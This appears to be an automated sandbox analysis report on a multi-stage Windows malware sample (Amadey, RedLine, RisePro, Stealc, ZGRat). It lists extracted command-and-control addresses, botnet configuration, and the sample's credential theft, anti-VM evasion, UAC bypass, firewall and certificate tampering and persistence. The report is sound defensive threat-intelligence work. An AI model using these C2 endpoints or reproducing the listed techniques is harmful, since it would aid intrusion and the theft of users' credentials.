amadey | 98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e

Analysis

max time kernel
61s
max time network
299s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
05/05/2024, 22:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe
Size

1.6MB
MD5

257b7b6010eabdb818f58f7da1c4a6e2
SHA1

f50aad02b8707f39788d775da1f5ef052476f474
SHA256

98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e
SHA512

418c649620243fa46aa172f44481e2980746764c1c9ccd570b5025923703def5d5798d024ed862dec40d24be47a786df73e7cc2700a4061f2ec4fedc8c54cd09
SSDEEP

49152:lq8aMhBNUQYV/0AO95+s1YHPexNOH3yPVVzWX6:lq8JhByZV875vUexNc3yPnd

Score

10^/10

amadey redline risepro stealc zgrat test1234 discovery evasion execution infostealer persistence rat spyware stealer themida trojan

Malware Config

Extracted

Family

amadey

Version

4.20

http://193.233.132.139

Attributes

install_dir
5454e6f062
install_file
explorta.exe
strings_key
c7a869c5ba1d72480093ec207994e2bf
url_paths
/sev56rkm/index.php

rc4.plain

Extracted

Family

amadey

Version

4.18

http://193.233.132.56

Attributes

install_dir
09fd851a4f
install_file
explorha.exe
strings_key
443351145ece4966ded809641c77cfa8
url_paths
/Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

Test1234

185.215.113.67:26260

Extracted

Family

risepro

147.45.47.93:58709

Extracted

Family

stealc

http://52.143.157.84

Attributes

url_path
/c73eed764cc59dcb.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral1/memory/3428-1056-0x00000000003A0000-0x0000000003C98000-memory.dmp	family_zgrat_v1
behavioral1/memory/3428-1084-0x000000001EDF0000-0x000000001EF00000-memory.dmp	family_zgrat_v1
behavioral1/memory/3428-1092-0x000000001EBF0000-0x000000001EC14000-memory.dmp	family_zgrat_v1

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	z278k3sED2oaPPuKC1qIfUPJ.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0006000000015cec-112.dat	family_redline
behavioral1/memory/2872-129-0x0000000000CD0000-0x0000000000D22000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f445e8fddd.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	z278k3sED2oaPPuKC1qIfUPJ.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorta.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amert.exe

Modifies boot configuration data using bcdedit 14 IoCs

pid	Process
1120	bcdedit.exe
1404	bcdedit.exe
3020	bcdedit.exe
2240	bcdedit.exe
2508	bcdedit.exe
2980	bcdedit.exe
1632	bcdedit.exe
3276	bcdedit.exe
1708	bcdedit.exe
1460	bcdedit.exe
832	bcdedit.exe
2284	bcdedit.exe
3532	bcdedit.exe
3268	bcdedit.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
256	2004	Xe7EjKVAqAMRHsbNmIAyvjKY.exe
49	2004	Xe7EjKVAqAMRHsbNmIAyvjKY.exe
266	2004	Xe7EjKVAqAMRHsbNmIAyvjKY.exe
269	2004	Xe7EjKVAqAMRHsbNmIAyvjKY.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3704	powershell.exe
3152	powershell.exe
4028	powershell.exe
3368	powershell.exe
4072	powershell.exe
1532	powershell.exe
1492	powershell.exe
1652	powershell.EXE
996	powershell.EXE
2004	powershell.exe
3952	powershell.exe
4092	powershell.exe
2828	powershell.exe
992	powershell.exe
3192	powershell.exe
268	powershell.EXE
1788	powershell.exe
2364	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 5 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
3712	netsh.exe
2892	netsh.exe
916	netsh.exe
2128	netsh.exe
3000	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	z278k3sED2oaPPuKC1qIfUPJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	z278k3sED2oaPPuKC1qIfUPJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorta.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amert.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f445e8fddd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f445e8fddd.exe

Drops startup file 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dUxofbRdrBpc7mTkhqw9vgSA.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Phlmm6a8tBttJF8hVJZC6Nik.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yTq0t2hCa6UCZzbUI3iPWTv3.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lcvAtYvSB2zLbQSOCEjPjlEJ.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UZNr45ofmxHByhUBBoCnF3tP.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tNV2qpVhmZ9SETd5V1xMRoW3.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DnnznnzNU8NeWXFypqcJPdXj.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\POgGcjxyUjKo9eTfflBDRTi1.bat	regasm.exe

Executes dropped EXE 32 IoCs

pid	Process
2604	explorta.exe
2760	amert.exe
1256	explorha.exe
2780	swiiiii.exe
1948	f445e8fddd.exe
2872	jok.exe
3008	swiiii.exe
2088	file300un.exe
2572	bcaa5b1d77.exe
2040	gold.exe
2004	Xe7EjKVAqAMRHsbNmIAyvjKY.exe
2852	d0KivyMFNNmcnXIqPmyGk9JJ.exe
2448	jSufjXRDasGbzBaPXI4Wjkit.exe
268	Nll8iSM3Es6hQuUFVGdpDLKp.exe
2100	alexxxxxxxx.exe
3080	qC1NgtgLPRjIDtSFdVkXHXB8.exe
3156	u1jo.0.exe
3680	install.exe
3908	NewB.exe
4000	u1jo.1.exe
2540	z278k3sED2oaPPuKC1qIfUPJ.exe
3544	GameService.exe
1600	GameService.exe
3700	GameService.exe
3724	GameService.exe
3736	GameService.exe
3472	GameSyncLink.exe
3916	449643.exe
1572	Ki9uLqg9jS1UxJFc7oOmpqTm.exe
3664	ISetup8.exe
3272	toolspub1.exe
3756	Install.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Wine	amert.exe
Key opened	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Wine	explorha.exe

Loads dropped DLL 64 IoCs

pid	Process
2084	98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe
2604	explorta.exe
2604	explorta.exe
2760	amert.exe
1256	explorha.exe
632	WerFault.exe
632	WerFault.exe
632	WerFault.exe
632	WerFault.exe
632	WerFault.exe
2604	explorta.exe
1256	explorha.exe
1256	explorha.exe
1256	explorha.exe
2604	explorta.exe
1256	explorha.exe
1256	explorha.exe
888	WerFault.exe
888	WerFault.exe
888	WerFault.exe
888	WerFault.exe
888	WerFault.exe
3036	regasm.exe
3036	regasm.exe
3036	regasm.exe
3036	regasm.exe
3036	regasm.exe
3036	regasm.exe
3036	regasm.exe
1256	explorha.exe
1256	explorha.exe
2400	WerFault.exe
2400	WerFault.exe
2400	WerFault.exe
3036	regasm.exe
3036	regasm.exe
2004	Xe7EjKVAqAMRHsbNmIAyvjKY.exe
2004	Xe7EjKVAqAMRHsbNmIAyvjKY.exe
2004	Xe7EjKVAqAMRHsbNmIAyvjKY.exe
2004	Xe7EjKVAqAMRHsbNmIAyvjKY.exe
3248	rundll32.exe
3248	rundll32.exe
3248	rundll32.exe
3248	rundll32.exe
2400	WerFault.exe
3268	rundll32.exe
3268	rundll32.exe
3268	rundll32.exe
3268	rundll32.exe
1256	explorha.exe
1256	explorha.exe
2004	Xe7EjKVAqAMRHsbNmIAyvjKY.exe
2004	Xe7EjKVAqAMRHsbNmIAyvjKY.exe
2004	Xe7EjKVAqAMRHsbNmIAyvjKY.exe
2004	Xe7EjKVAqAMRHsbNmIAyvjKY.exe
3036	regasm.exe
3208	cmd.exe
3736	GameService.exe
3736	GameService.exe
3472	GameSyncLink.exe
3916	449643.exe
3156	u1jo.0.exe
3156	u1jo.0.exe
3036	regasm.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 35 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/2084-2-0x0000000000A10000-0x0000000000F48000-memory.dmp	themida
behavioral1/memory/2084-7-0x0000000000A10000-0x0000000000F48000-memory.dmp	themida
behavioral1/memory/2084-6-0x0000000000A10000-0x0000000000F48000-memory.dmp	themida
behavioral1/memory/2084-4-0x0000000000A10000-0x0000000000F48000-memory.dmp	themida
behavioral1/memory/2084-5-0x0000000000A10000-0x0000000000F48000-memory.dmp	themida
behavioral1/memory/2084-3-0x0000000000A10000-0x0000000000F48000-memory.dmp	themida
behavioral1/memory/2084-0-0x0000000000A10000-0x0000000000F48000-memory.dmp	themida
behavioral1/memory/2084-1-0x0000000000A10000-0x0000000000F48000-memory.dmp	themida
behavioral1/files/0x0007000000014701-17.dat	themida
behavioral1/memory/2604-20-0x0000000000EC0000-0x00000000013F8000-memory.dmp	themida
behavioral1/memory/2604-23-0x0000000000EC0000-0x00000000013F8000-memory.dmp	themida
behavioral1/memory/2604-27-0x0000000000EC0000-0x00000000013F8000-memory.dmp	themida
behavioral1/memory/2604-26-0x0000000000EC0000-0x00000000013F8000-memory.dmp	themida
behavioral1/memory/2604-24-0x0000000000EC0000-0x00000000013F8000-memory.dmp	themida
behavioral1/memory/2604-25-0x0000000000EC0000-0x00000000013F8000-memory.dmp	themida
behavioral1/memory/2604-22-0x0000000000EC0000-0x00000000013F8000-memory.dmp	themida
behavioral1/memory/2604-21-0x0000000000EC0000-0x00000000013F8000-memory.dmp	themida
behavioral1/memory/2084-19-0x0000000000A10000-0x0000000000F48000-memory.dmp	themida
behavioral1/memory/2604-29-0x0000000000EC0000-0x00000000013F8000-memory.dmp	themida
behavioral1/memory/2604-48-0x0000000004650000-0x0000000004AF3000-memory.dmp	themida
behavioral1/memory/2604-42-0x0000000000EC0000-0x00000000013F8000-memory.dmp	themida
behavioral1/files/0x0006000000015c7c-104.dat	themida
behavioral1/memory/1948-133-0x0000000000010000-0x0000000000690000-memory.dmp	themida
behavioral1/memory/1948-134-0x0000000000010000-0x0000000000690000-memory.dmp	themida
behavioral1/memory/1948-137-0x0000000000010000-0x0000000000690000-memory.dmp	themida
behavioral1/memory/1948-136-0x0000000000010000-0x0000000000690000-memory.dmp	themida
behavioral1/memory/1948-135-0x0000000000010000-0x0000000000690000-memory.dmp	themida
behavioral1/memory/1948-132-0x0000000000010000-0x0000000000690000-memory.dmp	themida
behavioral1/memory/1948-131-0x0000000000010000-0x0000000000690000-memory.dmp	themida
behavioral1/memory/1948-130-0x0000000000010000-0x0000000000690000-memory.dmp	themida
behavioral1/memory/1948-128-0x0000000000010000-0x0000000000690000-memory.dmp	themida
behavioral1/memory/2604-297-0x0000000000EC0000-0x00000000013F8000-memory.dmp	themida
behavioral1/memory/2540-747-0x0000000140000000-0x0000000140861000-memory.dmp	themida
behavioral1/memory/1948-746-0x0000000000010000-0x0000000000690000-memory.dmp	themida
behavioral1/memory/2540-996-0x0000000140000000-0x0000000140861000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\f445e8fddd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000020001\\f445e8fddd.exe"	explorta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\bcaa5b1d77.exe = "C:\\Users\\Admin\\1000021002\\bcaa5b1d77.exe"	explorta.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	z278k3sED2oaPPuKC1qIfUPJ.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	explorta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	f445e8fddd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file300un.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
102	drive.google.com
32	pastebin.com
101	drive.google.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0006000000015d6e-196.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
2760	amert.exe
1256	explorha.exe
2540	z278k3sED2oaPPuKC1qIfUPJ.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2780 set thread context of 988	2780	swiiiii.exe	36
PID 3008 set thread context of 1640	3008	swiiii.exe	45
PID 2088 set thread context of 3036	2088	file300un.exe	63

Drops file in Program Files directory 14 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installc.bat	install.exe
File opened for modification	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installm.bat	install.exe
File created	C:\Program Files (x86)\GameSyncLink\GameService.exe	install.exe
File created	C:\Program Files (x86)\GameSyncLink\installg.bat	install.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\explorta.job	98b8a986c223f2cb071b41bdb24d0e577e1e34a0111ce7ed8d12f1d7885ee78e.exe
File created	C:\Windows\Tasks\explorha.job	amert.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3680	sc.exe
3588	sc.exe
3528	sc.exe
4032	sc.exe
1812	sc.exe
4036	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
632	2780	WerFault.exe	33
1800	988	WerFault.exe	36
2400	2100	WerFault.exe	70

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1jo.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1jo.1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1jo.1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	u1jo.0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	u1jo.0.exe

Creates scheduled task(s) 1 TTPs 23 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3588	schtasks.exe
3184	schtasks.exe
2940	schtasks.exe
4064	schtasks.exe
356	schtasks.exe
3444	schtasks.exe
1796	schtasks.exe
1228	schtasks.exe
3236	schtasks.exe
2112	schtasks.exe
1456	schtasks.exe
2096	schtasks.exe
3876	schtasks.exe
3500	schtasks.exe
448	schtasks.exe
1120	schtasks.exe
1456	schtasks.exe
276	schtasks.exe
2360	schtasks.exe
576	schtasks.exe
944	schtasks.exe
544	schtasks.exe
2040	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	jok.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	jok.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	regasm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	regasm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	regasm.exe
